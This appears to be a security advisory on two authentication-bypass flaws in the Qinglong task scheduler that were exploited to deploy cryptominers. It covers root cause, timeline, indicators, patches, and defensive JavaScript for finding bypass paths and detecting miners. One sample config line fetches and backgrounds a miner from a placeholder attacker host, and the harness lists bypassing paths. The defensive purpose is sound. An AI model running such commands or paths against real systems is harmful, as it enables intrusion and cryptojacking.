Hackers Exploit Authentication Bypass Flaws in Qinglong Task Scheduler to Deploy Cryptominers
Hackers exploited two authentication-bypass flaws in Qinglong’s open-source task scheduler (CVE-2026-3965 and CVE-2026-4047) to deploy cryptomining on exposed servers, beginning in February before public disclosure. The issues stemmed from a mismatch between middleware authorization and Express.js routing, allowing access to protected admin endpoints via unauthenticated paths. Infections were observed across multiple setups, with a rogue process named “.fullgc” consuming heavy CPU and attackers modifying config.sh to download miners from an external host; a fix was finally merged in PR #2941 after earlier mitigations in PR #2924 proved insufficient.

Qinglong Task Scheduler Exposes RCE via Authentication Bypass: Cryptomining Incidents and Patch Timeline
Overview
Two authentication bypass flaws in the Qinglong open‑source task scheduling platform enabled remote code execution (RCE) and allowed attackers to deploy cryptomining software on exposed servers. Exploitation began in early February, with public disclosure at month’s end, and rapid activity observed across multiple deployments. Qinglong, a self-hosted time management/dashboard tool popular among developers, has been forked thousands of times and remains under active scrutiny as researchers assess the scope of impact and the effectiveness of subsequent fixes.
The Vulnerabilities
Two CVEs describe the core bypass issues that enabled unauthorized access to administrative endpoints and subsequent code execution:
- CVE-2026-3965: A misconfigured rewrite rule mapped /open/* requests to /api/*, unintentionally exposing protected admin endpoints through an unauthenticated path. In short, sensitive admin routes were reachable without proper authentication due to routing misalignment.
- CVE-2026-4047: The authentication check treated paths as case‑sensitive (for example, /api/), while the router processed them in a case‑insensitive manner. This allowed requests that varied in case to bypass authentication and reach protected endpoints.
Root cause and technical context
The common thread behind both flaws was a mismatch between the security middleware’s assumptions and the Express.js routing behavior used by Qinglong. Security logic assumed one set of URL patterns would be handled in a particular way, while the framework treated those patterns differently. In the researchers’ words, the auth layer assumed URL structures would consistently map to protected resources, whereas the routing engine sometimes diverged from those expectations. This disconnect created an exploitable gap that attackers could leverage to reach admin functions without valid credentials.
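The mismatch described above, as an added model that is not Qinglong's code: an auth predicate that compares the raw, case-exact path against protected prefixes, a router view that (like Express by default) matches case-insensitively on the rewritten path, and a corrected predicate that decides on the same normalised path the router dispatches on. The route names, the rewrite helper and the sample paths are constructed for illustration.

```javascript
// Added example, not from the Qinglong project. Constructed admin prefixes.
const ADMIN_PREFIXES = ['/api/settings', '/api/tasks'];

// Assumed rewrite rule of the kind the advisory describes: /open/<rest> is
// served as /api/<rest>.
function applyRewrite(path) {
  return path.startsWith('/open/') ? '/api/' + path.slice('/open/'.length) : path;
}

// Router view: Express matches routes case-insensitively by default, so the
// handler that runs is chosen on the rewritten, lower-cased path.
function routerReachesAdmin(rawPath) {
  const seen = applyRewrite(rawPath).toLowerCase();
  return ADMIN_PREFIXES.some((p) => seen.startsWith(p));
}

// Flawed auth predicate: inspects the raw path, exact case, before the rewrite.
function flawedRequiresAuth(rawPath) {
  return ADMIN_PREFIXES.some((p) => rawPath.startsWith(p));
}

// Corrected predicate: make the auth decision on exactly the path the router
// will dispatch on, so the two layers can no longer disagree.
function fixedRequiresAuth(rawPath) {
  return routerReachesAdmin(rawPath);
}

// A path is a bypass when the router would reach an admin handler while the
// auth predicate lets the request through unauthenticated. Running this over
// a corpus of request paths is a regression check for the class of bug.
function findBypasses(paths, requiresAuth) {
  return paths.filter((p) => routerReachesAdmin(p) && !requiresAuth(p));
}

// Constructed sample paths: canonical, case-varied, rewritten, and unrelated.
const SAMPLE_PATHS = ['/api/settings', '/API/settings', '/open/settings', '/open/TASKS', '/health'];

// findBypasses(SAMPLE_PATHS, flawedRequiresAuth) -> 3 gaps; with fixedRequiresAuth -> none
```

The same harness can be pointed at a real middleware function and the application's own route table; the page's fix in PR #2941 closes the gap at the middleware level, which corresponds to the `fixedRequiresAuth` shape here.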
Exploitation timeline and observed activity
- Exploitation window: Attacks targeting these vulnerabilities began in early February, prior to the public disclosure at the end of February. Snyk and other researchers tracked ongoing activity through March.
- Initial discovery by users: Reports from Qinglong users identified rogue processes consuming substantial CPU resources, notably a hidden process named “.fullgc” that consumed between 85% and 100% of CPU. The name was chosen to imitate a benign “Full GC” operation, a tactic to evade detection.
- Initial exploitation specifics: Attackers altered Qinglong’s config.sh to inject commands that downloaded a cryptominer and executed it in the background, placing the miner at /ql/data/db/.fullgc.
- Payload and targets: The remote payload was hosted at a domain associated with file.551911.xyz and included binaries for Linux x86_64, ARM64, and macOS.
- Infections across environments: Infections were observed in diverse setups, including deployments behind Nginx and SSL relays. The attacks continued into early March, with multiple confirmed infections across different installations.
- Public and maintainer response: Public notices and issue threads began surfacing in late February/early March. Maintainers acknowledged the vulnerability and initially urged users to update. Mitigations introduced in an early pull request (PR #2924) focused on blocking certain command‑injection patterns but were deemed insufficient by researchers.
- Final corrective measure: A more complete fix arrived later in PR #2941, which addressed the authentication bypass in the middleware itself. This aligned the authorization logic with the actual routing behavior, effectively closing the bypass vector.
Impact and scope
- Affected versions: The vulnerabilities impacted Qinglong versions 2.20.1 and older. Systems running these versions that were publicly accessible or inadequately protected faced the highest risk.
- Real‑world impact: The attacks demonstrated that unauthenticated access to admin endpoints could be weaponized to alter configurations, spawn malicious processes, and drop cryptominers onto host systems. The persistence and stealth of the mechanism—running a background miner under a name designed to resemble a legitimate maintenance task—highlighted the challenge of quickly identifying compromised hosts.
- Platform context: Qinglong has gained notable traction in the developer community, with thousands of forks and tens of thousands of stars on the code hosting platform. This scale amplified the potential attack surface and underscored the importance of timely fixes and clear disclosure.
Attack footprint and defensive observations
- Behavior observed by researchers: Attackers leveraged the forged admin access to modify configuration scripts and insert commands that fetched miner binaries from remote resources, then executed them in persistent background processes.
- Detection signals: The emergence of a high‑CPU process named with a “.fullgc” suffix served as an unusual indicator. The manipulation of config.sh and unexpected network activity to pull binaries were additional red flags reported by affected users.
- Remediation trajectory: Initial mitigations aimed at filtering command‑injection patterns fell short of addressing the root cause. The subsequent middleware‑level fix corrected the core authentication bypass, reducing the likelihood of unauthenticated access to protected endpoints.
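The detection signals listed above, turned into a check an operator could run over host data. This is an added example, not from the advisory or the project: it flags hidden (dot-named) processes above a CPU threshold in `ps`-style output and config.sh lines that fetch remote content and background it. The `ps` lines, the config.sh fragment, the host placeholder and the 80% threshold are all constructed.

```javascript
// Added example, not from Qinglong. Threshold is an assumption.
const CPU_THRESHOLD = 80; // percent

// Constructed `ps aux`-style output; last column is COMMAND.
const PS_SAMPLE = `USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1000 500 ? Ss 10:00 0:00 /sbin/init
root 812 2.1 1.0 9000 800 ? Sl 10:01 0:03 node /ql/build/app.js
root 933 97.4 0.8 8000 700 ? Sl 10:05 1:22 /ql/data/db/.fullgc`;

// Constructed config.sh fragment with an injected fetch-and-run line
// (placeholder host, not the real payload domain).
const CONFIG_SAMPLE = `# config.sh
DefaultCronRule=""
curl -fsSL http://[attacker-host]/miner -o /ql/data/db/.fullgc && chmod +x /ql/data/db/.fullgc && /ql/data/db/.fullgc &
`;

function parsePs(text) {
  return text.trim().split('\n').slice(1).map((line) => {
    const f = line.trim().split(/\s+/);
    return { pid: Number(f[1]), cpu: Number(f[2]), command: f.slice(10).join(' ') };
  });
}

// A process whose executable basename starts with "." (hidden file) and that
// sits above the CPU threshold matches the ".fullgc" miner pattern.
function suspiciousProcesses(text) {
  return parsePs(text).filter((p) => {
    const base = p.command.split(' ')[0].split('/').pop();
    return base.startsWith('.') && p.cpu >= CPU_THRESHOLD;
  });
}

// config.sh lines (comments excluded) that download something and end with a
// trailing "&", i.e. run it in the background, are reported with line numbers.
const FETCH_RE = /\b(curl|wget)\b/;
const BACKGROUND_RE = /&\s*$/;
function suspiciousConfigLines(text) {
  return text.split('\n')
    .map((line, i) => ({ line: i + 1, text: line.trim() }))
    .filter((l) => !l.text.startsWith('#') && FETCH_RE.test(l.text) && BACKGROUND_RE.test(l.text));
}
```

On a live host the same two functions would take the output of `ps aux` and the contents of the deployment's config.sh; a hit on either is a reason to treat the instance as compromised rather than merely unpatched.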
What changed in the patch process
- Early mitigation attempts: The first round of fixes focused on defensive patterns—identifying and blocking specific command‑execution patterns and injection points. While these helped in some scenarios, researchers argued that they did not fully resolve the security gap.
- Definitive fix: The more robust correction was implemented in a subsequent update that reconciled the authentication logic with the routing framework’s behavior. By aligning middleware expectations with Express.js routing, the system no longer treated protected endpoints as unauthenticated under certain request patterns.
- State of unpatched instances: Given the rapid pace of discovery and deployment, some installations remained on vulnerable versions for weeks after disclosure. The combination of public accessibility and inconsistent patch adoption contributed to continued risk until the later fix was widely adopted.
Context and related security culture
- Open‑source dynamics: Qinglong’s popularity underscores a broader reality in open‑source software where widely used tooling can become attractive targets for malicious actors. The incident illustrates how systemic security gaps—rooted in routing and middleware interaction—can enable large‑scale exploitation if not promptly recognized and addressed.
- Industry takeaway: The episode reinforces the importance of integrating secure defaults in web frameworks and ensuring that authentication layers accurately reflect the behavior of underlying routers and handlers.
Current status and implications
- Security posture: With the middleware fix in place, the primary bypass pathway is mitigated. However, the case emphasizes the need for ongoing monitoring of open‑source components used in production environments and for promptly applying patches as they become available.
- Operational diligence: Administrators relying on Qinglong should validate their deployments against known vulnerable versions, verify that admin endpoints are not exposed, and monitor for unusual processes or CPU spikes that could indicate cryptominer activity or other tampering.
- Community and governance: The incident has fed into ongoing discussions about how maintainers communicate vulnerabilities, coordinate releases, and ensure timely, actionable guidance reaches users deploying open‑source software at scale.
Summary
Two authentication bypass flaws in Qinglong exposed protected admin endpoints through a misalignment between security middleware and Express.js routing. Exploitation began early in the year and led to cryptomining deployments on exposed servers, with a notable pattern of a stealthy background process named “.fullgc.” The root cause centered on a middleware/route mismatch, and a comprehensive fix was later introduced to close the bypass. The episode highlights the critical importance of aligning authentication with routing logic in web applications, especially in widely used open‑source projects that form the backbone of development workflows.